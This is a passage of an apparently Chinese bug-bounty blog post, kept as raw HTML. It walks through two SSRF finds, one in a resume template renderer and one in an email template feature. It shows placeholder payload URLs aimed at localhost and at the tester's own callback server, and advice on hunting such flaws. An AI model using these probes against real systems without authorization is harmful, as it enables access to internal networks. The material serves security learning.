一个简历编辑功能</span></strong></p></div></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">一开始只是看到一个功能：</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">简历编辑</span></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 80%;height: auto;box-sizing: border-box;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100016959" data-ratio="0.6787004" data-s="300,640" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-type="png" data-w="554" src="https://wechat2rss.xlab.app/img-proxy/?k=de06b018&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FDJX1rNqJe4lKgFvicc9phhM3gSlibia40asQQBvxd8lZpdLGVDZY6gZg3W74UMVkmjQgRYJU0kfE7Feb02n4uANf0IztibPw0glVcMZhCRRQLDQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">这个地方其实一开始是当成XSS点来看的。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">因为经验上：</span></p></div><div style="margin: 10px 0% 8px;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 3px solid rgb(219, 219, 219);border-bottom-left-radius: 0px;padding: 0px 0px 0px 8px;align-self: flex-start;box-sizing: border-box;"><div style="color: rgb(77, 77, 77);text-align: justify;font-family: SourceHan-S-SC;letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;width: 100%;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">能输入内容 + 能被渲染 → 优先考虑 XSS</span></strong></p></div></div><div style="margin: 20px 0%;box-sizing: border-box;"><div style="font-size: 14px;color: rgb(249, 110, 87);letter-spacing: 2px;line-height: 2.2;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">2. 它会“生成模板”</span></strong></p></div></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">在下面还有一个功能：</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">选择简历模板</span></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100016961" data-ratio="0.0956679" data-s="300,640" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-type="png" data-w="554" src="https://wechat2rss.xlab.app/img-proxy/?k=71cf9d44&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FDJX1rNqJe4nXHEUsMka6Hb52ib95zCkWFLeBfLpgjiasW2zsuY9xpDL4tRCgibzSic5nWS6SEVGM9aChPPClgUtCE5wpTeDTv5Cwk66xyB2aMo0%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">当你选择模板之后，系统会：</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">重新解析你的简历内容，并生成一个新的页面</span></p></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">这个流程里有一个很关键的点：</span></p></div><div style="margin: 10px 0% 8px;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 3px solid rgb(219, 219, 219);border-bottom-left-radius: 0px;padding: 0px 0px 0px 8px;align-self: flex-start;box-sizing: border-box;"><div style="color: rgb(77, 77, 77);font-family: SourceHan-S-SC;text-align: justify;letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;width: 100%;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">服务器会去“处理并渲染”你输入的内容</span></p></div></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">这就意味着：</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">👉 有机会让服务器“去请求某些东西”</span></p></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">这个时候思路就来了：</span></p></div><div style="margin: 10px 0% 8px;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 3px solid rgb(219, 219, 219);border-bottom-left-radius: 0px;padding: 0px 0px 0px 8px;align-self: flex-start;box-sizing: border-box;"><div style="color: rgb(77, 77, 77);font-family: SourceHan-S-SC;text-align: justify;letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;width: 100%;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">如果让它去加载一个 URL，会发生什么？</span></p></div></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">于是开始测试一些地址：</span></p></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="javascript"><code><span leaf=""><span class="code-snippet__attr">http</span>:<span class="code-snippet__comment">//xxx.com</span></span></code><br/><code><span leaf=""><span class="code-snippet__attr">http</span>:<span class="code-snippet__comment">//127.0.0.1</span></span></code><br/></pre></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">直接编辑保持会发现它并没有解析</span></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 80%;height: auto;box-sizing: border-box;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100016960" data-ratio="0.4075342" data-s="300,640" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-type="png" data-w="876" src="https://wechat2rss.xlab.app/img-proxy/?k=82f6faf7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FDJX1rNqJe4lC8mKGAq4X69icz3jNLoXWt3BLsuVrG0LFeC5X7Dbdewq0OibMp6wwRvn5JfuyiaU2qbwa8sv7PjbvnmIIlhHUf5L9zGDbFiaLevg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">点击下面的简历模板</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">选择一个模板 可以看到成功回显</span></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 80%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1.0740072" data-s="300,640" data-type="png" data-w="554" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100016962" src="https://wechat2rss.xlab.app/img-proxy/?k=3a8a0c85&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FDJX1rNqJe4mtXYXpOWxr7aibPAle641bZBMbZQ7Aou2EyPn2cVor9EdtM1dtNF80vN9YfWKSfHq9BtVpsgRUibZjF3ppYeCqyYyvbpYvvBp8M%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">这个时候可以确定漏洞存在</span></p></div><div style="font-size: 14px;color: rgb(249, 110, 87);letter-spacing: 2px;line-height: 2.2;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">3. 内网IP怎么确定</span></strong></p></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">起初输入127.0.0.1是没有回显的</span></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 80%;height: auto;box-sizing: border-box;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100016958" data-ratio="0.7843666" data-s="300,640" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-type="png" data-w="742" src="https://wechat2rss.xlab.app/img-proxy/?k=274df1dd&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FDJX1rNqJe4lAXMsdhkmf8VvpjX8OlzeBwDaZE3ZiaicSpX9a1jpicfxtuhiau5wm1ibI5w0Q196fObUibrWSVWCLaekEfuWfxBZN83d9elP2o4SCM%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">通过HAE插件找到172和192的ip，基本上把全站的数据包看了个遍...</span></p></div><div style="margin: 20px 0%;box-sizing: border-box;"><div style="font-size: 14px;color: rgb(249, 110, 87);letter-spacing: 2px;line-height: 2.2;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">4.漏洞评级</span></strong></p></div></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 80%;height: auto;box-sizing: border-box;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100016967" data-ratio="0.5974729" data-s="300,640" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-type="png" data-w="554" src="https://wechat2rss.xlab.app/img-proxy/?k=aa71c494&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FDJX1rNqJe4nASZlwwUicoGBnicK79VqnedHnWFmTVpIYx9ia43oZQT8y5YMsGmiagibtVMaA7uRxGxmGCEnVaHkK0IGFnYRl59KunVXib3wekwdBw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="margin: 10px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);text-shadow: rgb(51, 51, 51) 1px 1px 0px, rgb(51, 51, 51) 1px -1px 0px, rgb(51, 51, 51) -1px 1px 0px, rgb(51, 51, 51) -1px -1px 0px, rgb(51, 51, 51) 0px 1.4px 0px, rgb(51, 51, 51) 0px -1.4px 0px, rgb(51, 51, 51) -1.4px 0px 0px, rgb(51, 51, 51) 1.4px 0px 0px, rgb(239, 112, 96) 2px 2px 0px, rgb(239, 112, 96) 3px 3px 0px, rgb(239, 112, 96) 3px 1px 0px, rgb(255, 222, 23) 1px 3px 0px, rgb(255, 222, 23) 1px 1px 0px, rgb(255, 222, 23) 2px 3.4px 0px, rgb(255, 222, 23) 2px 0.6px 0px, rgb(239, 112, 96) 0.6px 2px 0px, rgb(239, 112, 96) 3.4px 2px 0px;letter-spacing: 3px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><em style="box-sizing: border-box;"><span leaf="">案例二：如何快速验证 SSRF</span></em></strong></p></div></div><div style="margin: 20px 0%;box-sizing: border-box;"><div style="font-size: 14px;color: rgb(249, 110, 87);letter-spacing: 2px;line-height: 2.2;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">1. “邮件模板”功能</span></strong></p></div></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">有一个地方可以填写内容，并插入一些资源。</span></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 80%;height: auto;box-sizing: border-box;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100016966" data-ratio="0.1642599" data-s="300,640" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-type="png" data-w="554" src="https://wechat2rss.xlab.app/img-proxy/?k=59098d61&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FDJX1rNqJe4lBiaA3fUia3xNQeNlRX4S5z7sIpQI4ibMp905lTJ8LqpgmFY7tMW9iaDZBwrxContGP02BmQ2rfnyEomFAjcvXMkWJZEMtZJ3YkCQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">插入获取</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">可以看到是全回显</span></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 80%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.4151625" data-s="300,640" data-type="png" data-w="554" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100016964" src="https://wechat2rss.xlab.app/img-proxy/?k=5271868b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FDJX1rNqJe4nzjL4O8ibKanYRzvuYpx945HRrTvvnCBPnVMEEKZHIvdKEMjKRz8WxlFaMNia9lux4od17q9wpUsIib5tvte2d5xDia7eP09s35Bc%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="margin: 20px 0%;box-sizing: border-box;"><p style="font-size: 14px;color: rgb(249, 110, 87);letter-spacing: 2px;line-height: 2.2;box-sizing: border-box;"><ol style="list-style-type: decimal;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-1" start="2"><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">验证方法</span></strong></p></li></ol></p></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">这时候可以做一个很经典的验证：</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">自己起一个HTTP服务（本地或VPS）</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">然后让目标去请求你的地址：</span></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="javascript"><code><span leaf=""><span class="code-snippet__attr">http</span>:<span class="code-snippet__comment">//你的服务器/test</span></span></code></pre></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 80%;height: auto;box-sizing: border-box;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100016965" data-ratio="0.4512635" data-s="300,640" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-type="png" data-w="554" src="https://wechat2rss.xlab.app/img-proxy/?k=807993ec&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FDJX1rNqJe4nNODwzLnJyp1FbwuPzhbnBfxrnjAWvrZrHv0M4W5hdQ7oUwtmT2P6ga6NcuohFCheToDibREcO7vfqYGgyNibTy8qR7ibrsmJlnc%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="margin: 20px 0%;box-sizing: border-box;"><p style="font-size: 14px;color: rgb(249, 110, 87);letter-spacing: 2px;line-height: 2.2;box-sizing: border-box;"><ol style="list-style-type: decimal;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-1" start="3"><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">结果验证</span></strong></p></li></ol></p></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">如果成功：</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">你会在自己服务器看到请求记录</span></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 80%;height: auto;box-sizing: border-box;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100016963" data-ratio="0.1500904" data-s="300,640" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-type="png" data-w="553" src="https://wechat2rss.xlab.app/img-proxy/?k=9bd29cb1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FDJX1rNqJe4nkU8XbpumtA51jedFbsB9LTHFA08IiaPaSIgMIC2QthopLJzZxibfElMx0HUbzS1PHwGWUvxrUEtvuKUDOhV2ytA2oJj0j5GO2o%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="margin: 10px 0% 8px;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 3px solid rgb(219, 219, 219);border-bottom-left-radius: 0px;padding: 0px 0px 0px 8px;align-self: flex-start;box-sizing: border-box;"><div style="color: rgb(30, 30, 30);font-family: SourceHan-S-SC;text-align: justify;letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;width: 100%;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">证明“请求是服务器发起的”，而不是浏览器</span></strong></p></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;margin: 10px 0px;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 5%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 4px 0px 10px;box-sizing: border-box;"><div style="display: inline-block;width: 27px;height: 27px;vertical-align: top;overflow: hidden;background-color: rgb(30, 30, 30);box-shadow: rgb(219, 219, 219) 7px 7px 0px 0px;box-sizing: border-box;"><div style="text-align: center;margin: 0px;box-sizing: border-box;"><div style="font-size: 18px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">3</span></p></div></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;align-self: flex-start;flex: 0 0 auto;min-width: 5%;max-width: 100%;height: auto;padding: 0px 0px 0px 10px;border-style: solid;border-width: 0px 0px 1px;box-sizing: border-box;"><div style="font-size: 22px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">总结</span></p></div></div></div><div style="margin: 10px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);text-shadow: rgb(51, 51, 51) 1px 1px 0px, rgb(51, 51, 51) 1px -1px 0px, rgb(51, 51, 51) -1px 1px 0px, rgb(51, 51, 51) -1px -1px 0px, rgb(51, 51, 51) 0px 1.4px 0px, rgb(51, 51, 51) 0px -1.4px 0px, rgb(51, 51, 51) -1.4px 0px 0px, rgb(51, 51, 51) 1.4px 0px 0px, rgb(239, 112, 96) 2px 2px 0px, rgb(239, 112, 96) 3px 3px 0px, rgb(239, 112, 96) 3px 1px 0px, rgb(255, 222, 23) 1px 3px 0px, rgb(255, 222, 23) 1px 1px 0px, rgb(255, 222, 23) 2px 3.4px 0px, rgb(255, 222, 23) 2px 0.6px 0px, rgb(239, 112, 96) 0.6px 2px 0px, rgb(239, 112, 96) 3.4px 2px 0px;letter-spacing: 3px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><em style="box-sizing: border-box;"><span leaf="">SSRF漏洞最核心的思路是什么？</span></em></strong></p></div></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">如果把整个过程拆一下，其实就三步：</span></p></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">1️⃣ 找“服务器会请求外部资源”的点</span></p></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">比如：</span></p></div><p style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-2"><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">模板</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">图片</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">URL</span></p></li></ul></p><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2️⃣ 想办法控制请求地址</span></p></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">让它请求：</span></p></div><p style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-2"><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">你自己的服务器</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">内网地址</span></p></li></ul></p><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">3️⃣ 判断是否有回显 / 是否可利用</span></p></div><p style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-2"><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">有回显 → 直接利用</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">无回显 → 用外带方式验证</span></p></li></ul></p><div style="margin: 10px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);text-shadow: rgb(51, 51, 51) 1px 1px 0px, rgb(51, 51, 51) 1px -1px 0px, rgb(51, 51, 51) -1px 1px 0px, rgb(51, 51, 51) -1px -1px 0px, rgb(51, 51, 51) 0px 1.4px 0px, rgb(51, 51, 51) 0px -1.4px 0px, rgb(51, 51, 51) -1.4px 0px 0px, rgb(51, 51, 51) 1.4px 0px 0px, rgb(239, 112, 96) 2px 2px 0px, rgb(239, 112, 96) 3px 3px 0px, rgb(239, 112, 96) 3px 1px 0px, rgb(255, 222, 23) 1px 3px 0px, rgb(255, 222, 23) 1px 1px 0px, rgb(255, 222, 23) 2px 3.4px 0px, rgb(255, 222, 23) 2px 0.6px 0px, rgb(239, 112, 96) 0.6px 2px 0px, rgb(239, 112, 96) 3.4px 2px 0px;letter-spacing: 3px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><em style="box-sizing: border-box;"><span leaf="">SSRF漏洞挖掘小建议</span></em></strong></p></div></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">很多人学学习了SSRF的漏洞原理，但一直没挖到，原因其实很简单：</span></p></div><div style="margin: 10px 0% 8px;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 3px solid rgb(219, 219, 219);border-bottom-left-radius: 0px;padding: 0px 0px 0px 8px;align-self: flex-start;box-sizing: border-box;"><div style="color: rgb(77, 77, 77);font-family: SourceHan-S-SC;text-align: justify;letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;width: 100%;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">没有把它当成“一个需要主动去试的点”</span></strong></p></div></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">你可以记住一个简单的习惯：</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">看到这些功能时，停一下：</span></p></div><p style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-2"><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">模板渲染</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">URL 加载</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">外部资源引用</span></p></li></ul></p><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">然后问自己一句：</span></p></div><div style="margin: 10px 0% 8px;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 3px solid rgb(219, 219, 219);border-bottom-left-radius: 